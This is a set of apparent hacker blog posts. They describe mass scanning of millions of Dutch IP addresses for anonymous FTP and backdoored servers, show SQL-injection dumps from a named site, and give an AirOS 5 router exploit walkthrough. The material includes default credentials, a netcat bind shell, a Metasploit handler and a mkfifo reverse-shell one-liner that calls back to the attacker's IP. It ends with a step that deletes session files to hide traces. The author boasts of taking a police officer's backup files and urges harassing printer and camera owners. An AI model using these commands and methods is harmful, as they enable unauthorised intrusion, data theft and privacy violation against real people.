FTP scan -STATS-

FTP scan -STATS-

For those who is interested in my stats and findings after a nice big scan of FTP port 21

I scanned in groups of 50.000 Dutch IPs with NMap.
I used -T5 to speed up the things so he can missed some
ftp servers with slow response.

scan command/the script I used

# $1 : infile (without .txt) output is infile + _p21.gnmap/nmap/xml
sudo nmap -v -r -iL “$1”.txt -Pn -T5 -sV –version-all -n -p 21 -oA ~/workingdir/output/p21/”$1″_p21 –script=ftp-anon,banner,ftp-proftpd-backdoor,ftp-vsftpd-backdoor –open -sS

Ofcourse you can use your own script for this. But this one suited me best at the moment.
I scanned for this 105 ip lists of 5000 gives me a total of 5.250.000 IP’s

Not 1 time I got a hit from the 2 scripts of nmap which checks for a backdoored FTP version

num ip’s : 5.250.000 (list)
uniq IP’s w/o port 21 : 41.412 (list)

Top 5 ip groups (list)
6963     145.216
3442     145.217
1642       83.162
1194     212.204
996        86.109

backdoored : 0
Found Service Info : 142 *not much(-T5 is fastscan with not enough waiting time)

Top 5
85 Service Info: OS: Unix
27 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
4 Service Info: Device: firewall
3 Service Info: Device: broadband router
2 Service Info: OS: VxWorks; CPE: cpe:/o:windriver:vxworks

FTP anonymous access : 1765* succesfully logins with user:anonymous pass:anon@

also the scan did a banner grab (short one because of the T5 option of NMap and a lot of banners aren’t grabbed because of the scriptwaiting time)
Banner grabbed : 20457 (almost 50% of the open ports found)

Return codes top 3
20190 220
62 530
46 550

ProFTPD : 5308 (1/4 of all the banners)

Top 5 versions
621 ProFTPD 1.3.1 Server
368 ProFTPD 1.3.3c Server
355 ProFTPD 1.3.2e Server
240 ProFTPD 1.3.3e Server
141 ProFTPD 1.3.3a Server

vsFTPD : 1653

Top 5 versions
907 (vsFTPd 2.0.5)
205 (vsFTPd 2.0.7)
122 (vsFTPd 2.3.2)
119 (vsFTPd 2.2.2)
68 (vsFTPd 2.0.1)

FileZilla : 710

Top 5 versions
168 FileZilla Server version 0.9.37 beta
142 FileZilla Server version 0.9.39 beta
83 FileZilla Server version 0.9.40 beta
72 FileZilla Server version 0.9.34 beta
41 FileZilla Server version 0.9.33 beta

VxWorks : 99

Top 5 versions
69 VxWorks (VxWorks5.4.2) FTP server ready
17 Tornado-vxWorks (VxWorks5.4.2) FTP server ready
9 VxWorks (5.4.2) FTP server ready
2 VxWorks (VxWorks5.5.1) FTP server ready
1 VxWorks FTP server (VxWorks 5.4.2) ready.

NASFTP : 359
Turbo : 350
277 Turbo station 2.x 1.3.2e Server
73 Turbo station 2.x 1.3.1rc2 Server
3.x Server : 9
Serv-U : 139
Top 5 versions
  29   v6.4
  16   v6.0
  14   v11.1
  11   v6.2
    8   v6.3

FTP Server ready. : 2469

some other statics
NAS found : 615
Microsoft FTP Service : 1805
FritzBox : 86
‘welcome’ in banner : 3116
‘ready’ in banner :8792
service not available : 33
Cisco : 23
P2612HW : 62 *ZyXEL Router
camera’s : 47 *39 AXIS
DreamBox : 197
Moxa FTP : 13
DSL Router : 30
DiskStation : 255
Check Point Firewall : 119
TCAdmin : 40
Winsock ready… : 93
Gene6 : 54
spftp : 38
ucftpd : 20
FTP-Uploadserver : 61
BulletProof FTP : 27
Titan FTP : 14
zFTPServer : 20
Cerberus : 22
Rumpus : 37
JD FTP : 33
Card AOS : 68
pd-admin : 6
Welcome to the CS network : 25 ? so many
Netwerkschijf : 7 *dutch for “disk drive”
Inactivity timer text : 72
Connection refused,
unknown IP address : 59
IP in banner : 3859

Why I make stats?
can be handy with pentesting!
For example knowning that the word ‘welcome’ isn’t often used (+/- 25%)
and ‘ready’ not reaching 50% that a scanner based on return strings
isn’t the best idea.
Or if you see the versions of the mainly used ftp servers don’t have the latest
version. 1.3.1. for ProFTPD and 2.0.5 for vsFTPd. and googling around brings
a lot of exploits based on this versions.
Serv-U 6.4 is most used, and a lot of exploits are on the net.
(Dir traversal, BoF’s, Auth. bypass).

oh.. the total scan time was just over 120 hours. 😀
I have the datafiles for sharing if you want them
(ip list, scan results, etc. contact me if you want them for your own research).

[sqli] Kimia

An old one, but still works fine!



first some googling..

google dorks:

http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41

ofcourse the makers
This I won’t remove 😉 they are vulnerable themselfs 😛

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: System User: foxanr_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema


Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: @<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110


Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: @<removed for privacy>
Host Name:

table structure:  http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html

Use with Havij Pro 1.15

[exploit] AirOS 5

Vulnerable: Ubiquiti Networks, Inc. AirOS 5
Ubiquiti Networks, Inc. AirOS 4.0
Ubiquiti Networks, Inc. AirOS 3.6.1

Username: ubnt
Password: ubnt
first off:

go to

here’s a menu for up/downloading,etc 🙂
download /etc/passwd and voilá
(or command execute: cat /etc/passwd)

you can download

Command lines:
wlanconfig ath0 list scan
netstat -a
uname -a
ps -A
ls -a
or try:
cat /etc/passwd


let’s create a shell with Metasploit
Cmd to execute at sd.css:
nc -l -p 4444 -e /bin/sh -i

-open metasploit

sudo ./msfconsole
> use multi/handler
exploit(handler) > set payload cmd/unix/bind_netcat
exploit(handler) > set rhost <target>
exploit(handler) > exploit
Started bind handler
Starting the payload handler…
Command shell session 10 opened ( -> xxx.xxx.xxx.xx:4444) at 2012-01-04 07:48:50 +0100
so, there’s your shell
(don’t forget to open your port 4444 if behind a router.)

or use nc ofcourse
nc <ip> 4444

at the same page after you’re done playing around

execute command:
rm /tmp/.sessions.tdb
I noticed Netcat on AirOS doesn’t support -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your ISP-IP 4444 >/tmp/f


Portscanning Fun – Port 21

Portscanning Fun – Port 21

Let’s go looking for those FTP servers.
Grab data, exploit servers, and again.. irritate people.. 😉

Again, linux used here; windows is possible but far more difficult to get
what you need.
– NMap
– Metasploit
– telnet/ftp/putty/or whatever you find usefull
– a lot of spare time..

In the last tutorial I explained how to get a IP list from specific country.
NMap has the ability to grab random IP’s from everywhere. can be fun sometimes!
(-iR <num ip to get>)

So let’s start getting some port 21’s from the net,..
looking for juicy data..

sudo nmap -v -iR 10000 -Pn -n -p 21 -oN output_port21.lst –script=ftp-anon,banner,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor –open –sC

(or use the ip lists from geoipgen results)

sudo nmap -v -iL iplist_nl.txt -Pn -n -p 21 -oN output_port21.lst –script=ftp-anon,banner,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor –open –sC


Portscanning Fun

Portscanning Fun
(A HowDoI*-document)

*I prefer HowDoI instead of Tutorial, because it isn’t a tutorial 😛

When I’m totaly bored (which is often) I go take a walk in the park….

but in this case the park is the internet 🙂
Tired of google or sql injecting/xss sites, etc etc.
I go searching for fun stuff on the not-crawled/indexed ip’s.
A lot to see, test, exploit, browse or just irritate people.

So, what do I use

– Linux (or cygwin – linux-in-windows, great program, a must for windows users)
– GeoIPGen (http://code.google.com/p/geoipgen/) from
Download geolite database (wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz)
unpack it in same directory as GeoIPGen
– AngryIP Scanner (wget http://sourceforge.net/projects/ipscan/files/ipscan3-binary/3.0-beta6/ipscan_3.0-beta6_i386.deb)
(or windows/other version at http://www.angryip.org/w/Download)
– any scan/pentest program you need.

ok then, let’s go hunting..
I want to find ip adresses only from the netherlands..
can be any country you want (database is nog 100% correct,
Lite version.. but good enough!)

Let’s get a list of ip adresses (-n num of ips)
$ ./geoipgen -n 10000 NL > iplist_10000_NL.lst

(it will keep track of already found IP adresses in ~/.geoipgen/ so when you search again
it won’t show the same ones again).

now start AngryIP Scanner;
$ sudo java -jar ipscan-linux-3.0-git.jar

I change the options a little bit, to save some time scanning.
Delay 0
Max num threads 200
Pinging Method ICMP Echo (that why I use sudo – ICMP uses RAW tcp/ip, you can also add CAP’s to the jarfile
sudo setcap cap_new_raw,cap_net_admin=eip ipscan-linux-3.0-git.jar)
Scan dead hosts Checked
Skip likely broadcast IP unchecked

Adapt timeout 100
Port selection: 21,23,80,8080
*can choose more or others, but these are the most often open ports.
because the size of my scans I limited to these 4,
adding 110,137,139,443,3306,etc can give more valuable info
but takes much much more time.
Yesterday I scanned 100.000 ip adresses within a few hours.

Host with open ports only
then “Select fetchers” option I use only Ports,Web detect,Filtered Ports (in this order)

Now I import the IP list
Press Start… and wait wait wait ;P
after scan export all..

and see a nice fun list to explore:
example (a actual list from my scans, don’t misuse :P) 80 23 Boa/0.93.15 (with Intersil Extensions) 23,80 21,8080 Unknown/0.0 UPnP/1.0 GlobespanVirata-EmWeb/R6_1_0 21,80 23,8080 Apache/2.2.21 (Win32) PHP/5.3.6 80 [n a] Apache/1.3.33 (Unix) PHP/4.0.6 mod_ssl/2.8.24 OpenSSL/0.9.7g 21,80 [n a] thttpd 80 [n a] Oracle-Application-Server-10g/ Oracle-HTTP-Server 80 [n a] Virata-EmWeb/R6_2_1 21 [n a] [n a] 80 21,23,8080 Microsoft-IIS/6.0 80 21,23,8080 Apache/2.2.16 (Unix) PHP/5.3.3 21,80 [n a] Apache/2.2.20 (Ubuntu) 80 [n a] Virata-EmWeb/R6_2_1 80 21,23,8080 Microsoft-IIS/6.0 23,80 [n a] [n a] 80 21,23,8080 Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 80 21,23,8080 Apache/2.0.46 (CentOS) 80 [n a] Apache/2.0.63 (NETWARE) mod_jk/1.2.23 80 21,23,8080 Microsoft-IIS/6.0 80 21,23,8080 Citrix Web PN Server 80 21,23,8080 Microsoft-IIS/6.0 80 21,23,8080 Apache/2.2.14 (Ubuntu) 80 21,23,8080 Microsoft-IIS/7.5 80 21,23,8080 Microsoft-IIS/6.0 21,80 [n a] Apache/2 21 23,80 nginx 21,80 23,8080 Apache 80 21,23,8080 Lotus-Domino 21,80 23,8080 Microsoft-IIS/6.0 80 21,23,8080 Microsoft-IIS/5.0 80 21,23,8080 IBM_HTTP_Server 80 21,23,8080 Apache/2.0.55 (Unix) DAV/2 mod_jk/1.2.6 80 21,23,8080 Microsoft-IIS/6.0 80 21,23,8080 [n a] 21 23,80,8080 [n a] 80 21,23,8080 Microsoft-IIS/6.0 80 21,23,8080 Roxen 80 21,23,8080 [n a] 80 21,23,8080 [n a] 80 21,23,8080 [n a] 80 [n a] [n a] 23,80 [n a] ISOS/9.0 UPnP/1.0 Conexant-EmWeb/R6_1_0 23,80 [n a] ISOS/9.0 UPnP/1.0 Conexant-EmWeb/R6_1_0 21 8080 [n a] 80 23,8080 ISOS/9.0 UPnP/1.0 Conexant-EmWeb/R6_1_0

so you see, a lot of neat things to explore
routers,printers,old http servers,naz’s,etc.
today I even found a climate control system webbased without password. grinnn..
routers are mostly unsecured, standard passwords, simple exploits by bypassing security,
or resetting to standard-factory-defaults, etc. (I’m actualy busy at the moment to
make a router tool which has all the vulns,advisories,poc’s,exploits listed per router
and some scanning and exploit abilities)
explore the ftp for anonymous logins with metasploit or other scanners,
irritate people by nuking there printers (sending pages, DoS them or whatever)
Watch there security camera’s, or try to root them..
Unlimited possibilties..

for a closer look at the systems use nmap or metasploit, nessus, nexpose or windows
users eEye Retina, N-stalker or Acunetix (Acunetix is handy for exploring routers etc.)

Portscanning Fun – IP listings

Portscanning Fun – IP listings
(A HowDoI*-document)

*I prefer HowDoI instead of Tutorial, because it isn’t a tutorial.. just how I do it.. 😛

– linux/cygwin
– geoipgen 0.4 (see [Tutorial] Portscanning Fun for installation guide)
– nmap – try to install newest svn co https://svn.nmap.org/nmap
windows version can be used, but mind the lack of RAW package use,
so scan options can’t be SYN. use Connect -sC)

I explained earlier how to get some country specific ip’s from geoipgen.
./geoipgen -n 5000 NL > 5000_ip_nl.txt
.. will result in a ip list of 5000 dutch ip’s.

note: to get random ip’s you can use NMap’s command -iR <num random ports>,

sudo nmap -iR 5000 -sC -p 21 –script=ftp-anon,banner -PN -n -oN output.txt

will scan for anon ftp acces without resolve dns (faster), no port open scan (just try)
on 5000 random ip’s. (choose -iL <iplist> for specific ip’s – gathered from geoipgen)

My Workingdir is getting messy with al those lists, scans, ect.
let’s get it clean and thight..

I want to target dutch ip’s in this example.
You can ofcourse change everything for your own needs.

first create a main working dir
mkdir ip_fun

go to dir

and make a data dir for your ip-lists
mkdir ips

ok, because of the size of our possibilities I’m gonna make a list of ip’s-list files.
I’m gonna make ip lists of 50000 ip’s and 50 of them.
(Or less.. choose what you need.. I want a big list, so I go for 50 files of 50000 ip’s (2.500.000 ip’s))

make a bash script:

while [ $COUNTER -lt 50 ]; do
./geoipgen -n 50000 nl > nl_50000_”$COUNTER”.txt

this will make me a list of 50 files named nl_50000_<num>.txt

move these to your new-made dir

now you can scan a little more specific and faster.

let’s try…..
nmap scan for anonymous ftp acces and juicy files. (one of my favorite :P)

sudo nmap -iL /ip_fun/ips/nl_50000_1.txt -v -n -sS –open -p 21 -PN –script=ftp-anon,banner -oN /ip_fun/nmap_p21_scan.txt

or port 80 scan

sudo nmap -iL /ip_fun/ips/nl_50000_1.txt -v -n -sS –open -p 80,8080 -PN –script=banner,http-headers,http-favicon,http-malware-host,http-enum,http-robots.txt,http-php-version,http-usedir-enum,http-trace,http-auth,address-info -oN /ip_fun/nl_50000_1.scan_port80.txt

note: if you use nmap for windows, it’s an older version and not all the scripts are added.
http-robots,http-php-version,http-usedir-enum are recently.

To get some automated scans ordely I suggest the following structure
(This is how I do it)

First I scan some of my ip lists.
I make another dir in ip_fun.
mkdir scans
I’m in to the port 21 for looking around in other peoples stuff.. 😀
I made a small automating script for this *mind that I use .txt extension for this use.

# $1 : ipfile list WITHOUT extension (cause output file uses same name)
sudo nmap -v -iL ips/”$1″.txt -Pn -n -p 21 -oN scans/”$1″.scan_port21.txt –script=ftp-anon,banner,ftp-proftpd-backdoor,ftp-vsftpd-backdoor –open -sC

safe this in: /ip_fun/scan_p21.sh
now hit off with
(filename can be different ofcourse)
./scan_p21 nl_50000_01
./scan_p21 nl_50000_02
./scan_p21 nl_50000_03
./scan_p21 nl_50000_04
./scan_p21 nl_50000_05

that will give me 5*50000 scanned ip’s for port 21
listed at /ip_fun/scans/*.scan_port21.txt

You can manualy read them or grep for nice things.
(nmap’s output is Normal (you can use -oG for easier grepping) but I choose this method for my manualy reading)

cat *.txt | grep -B 5 -i “camera” | grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ | grep -v “192.168” | sort -g | uniq > searches/cameras.txt

you see I made a different dir for the output (else the further searches will have those outputs also.
this will result in a sorted IP list of the gives search.

or NAS (harddrives)

cat *.txt | grep -B 5 -i “nas” | grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ | grep -v “192.168” | sort -g | uniq > searches/nas.txt

or just search for a ftp server you know how to exploit
there a lot of exploitable ftp servers.
eg. ProFTPD 1.3.0 (in some cases vurnerable to sql injection by password and name input )

cat *.txt | grep -B 5 -i “proftpd 1.3.0” | grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ | grep -v “192.168” | sort -g | uniq > searches/proftpd_1.3.1.txt

short code explanation:
first grep is the search keyword (-B 5 is for 5 lines before finding, need to have the ip ;-))
second grep is the IP grep, third grep is to check if ip starts with 192.168. if so, don’t output.. don’t need

ofcourse I script this.. 😀

# $1: keyword search
cat *.txt | grep -B 5 -i “$1” | grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ | grep -v “192.168” | sort -g | uniq > searches/”$1″.txt

try dreambox, disk, ect.

I just finished 50 ip-lists of 50000 ip’s on port 21.
and I truly did find some juicy files ..
rofl.. I even found a usb-drive backup from a head of the police in amsterdam/rijnland.
EPIC fun.. 😀
(no I will not share it :P)

– a lot of nas/harddrives has password web protected authentication, but FTP anonymous login possibilities. (enough exploits on the web to jump out of the anony-box and run free on their servers/drives.
– dreamboxes are fun to watch. television. (you can change their actualy viewing channels remote, (and send them on-screen messages. fun!)
– a lot of music, movies, iso’s are shared.
– people don’t like updates. so a lot of old software is in use.
– port 21 info can say a lot about the running server, if it looks interesting scan some more
(port 80,8080,443,110,etc)
a short overview:
after this I have a path structure of

with a lof of ip files in ips, scan info in ‘scans’ and my search results in searches.

I’m just a beginner at this.. I just share my experiences..
feel free to critisize or add to my ideas..